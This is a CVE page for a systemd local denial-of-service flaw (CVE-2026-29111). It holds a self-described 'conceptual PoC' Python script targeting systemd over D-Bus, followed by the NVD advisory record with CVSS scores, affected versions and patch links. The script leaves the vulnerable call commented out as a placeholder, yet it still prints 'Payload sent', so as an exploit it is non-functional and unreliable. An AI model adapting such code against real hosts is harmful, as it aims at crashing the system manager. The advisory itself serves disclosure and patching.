CVE-2026-29111

# This is a conceptual PoC. The exact IPC interface and parameters required to # trigger the vulnerability depend on the specific implementation details of systemd. import dbus import sys def trigger_vulnerability(): try: # Connect to the system bus bus = dbus.SystemBus() # The vulnerable IPC call is likely part of the systemd manager interface # Note: The exact object path and interface name would need to be confirmed # via source code analysis of the specific vulnerable commit. systemd_object = bus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1') manager_interface = dbus.Interface(systemd_object, 'org.freedesktop.systemd1.Manager') # Construct spurious data # The vulnerability is triggered by specific malformed data in an unprivileged call spurious_data = "A" * 1000 # Example payload length # Attempt to invoke the vulnerable method # Replace 'VulnerableMethod' with the actual method name if known # manager_interface.VulnerableMethod(spurious_data) print("[+] Payload sent, check system status.") except dbus.exceptions.DBusException as e: print(f"[-] DBus Exception: {e}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": trigger_vulnerability()

{"cve": {"id": "CVE-2026-29111", "sourceIdentifier": "[email protected]", "published": "2026-03-23T22:16:26.267", "lastModified": "2026-04-15T16:44:38.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "systemd, a system and service manager, (as PID 1) hits an assert and freezes execution when an unprivileged IPC API call is made with spurious data. On version v249 and older the effect is not an assert, but stack overwriting, with the attacker controlled content. From version v250 and newer this is not possible as the safety check causes an assert instead. This IPC call was added in v239, so versions older than that are not affected. Versions 260-rc1, 259.2, 258.5, and 257.11 contain patches. No known workarounds are available."}, {"lang": "es", "value": "systemd, un gestor de sistemas y servicios, (como PID 1) activa una aserción y congela la ejecución cuando se realiza una llamada a la API IPC no privilegiada con datos espurios. En la versión v249 y anteriores, el efecto no es una aserción, sino una sobrescritura de pila, con contenido controlado por el atacante. A partir de la versión v250 y posteriores, esto no es posible ya que la comprobación de seguridad provoca una aserción en su lugar. Esta llamada IPC se añadió en v239, por lo que las versiones anteriores a esa no están afectadas. Las versiones 260-rc1, 259.2, 258.5 y 257.11 contienen parches. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:systemd_project:systemd:*:*:*:*:*:*:*:*", "versionStartIncluding": "239", "versionEndExcluding": "257.11", "matchCriteriaId": "8B7440B3-21E0-4CE7-B414-B468DF589EB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:systemd_project:systemd:*:*:*:*:*:*:*:*", "versionStartIncluding": "258", "versionEndExcluding": "258.5", "matchCriteriaId": "17A98BF3-E6DB-4C8F-8D17-858CB679884E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:systemd_project:systemd:*:*:*:*:*:*:*:*", "versionStartIncluding": "259", "versionEndExcluding": "259.2", "matchCriteriaId": "FE1B8AFB-01F5-4B3F-BB53-DCAE57F2C2A2"}]}]}], "references": [{"url": "https://github.com/systemd/systemd/commit/1d22f706bd04f45f8422e17fbde3f56ece17758a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/20021e7686426052e3a7505425d7e12085feb2a6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/21167006574d6b83813c7596759b474f56562412", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/3cee294fe8cf4fa0eff933ab21416d099942cabd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/42aee39107fbdd7db1ccd402a2151822b2805e9f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/54588d2dedff54bfb6036670820650e4ea74628f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/7ac3220213690e8a8d6d2a6e81e43bd1dce01d69", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/80acea4ef80a4bb78560ed970c34952299b890d6", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/b5fd14693057e5f2c9b4a49603be64ec3608ff6c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/commit/efa6ba2ab625aaa160ac435a09e6482fc63bdbe8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/systemd/systemd/security/advisories/GHSA-gx6q-6f99-m764", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}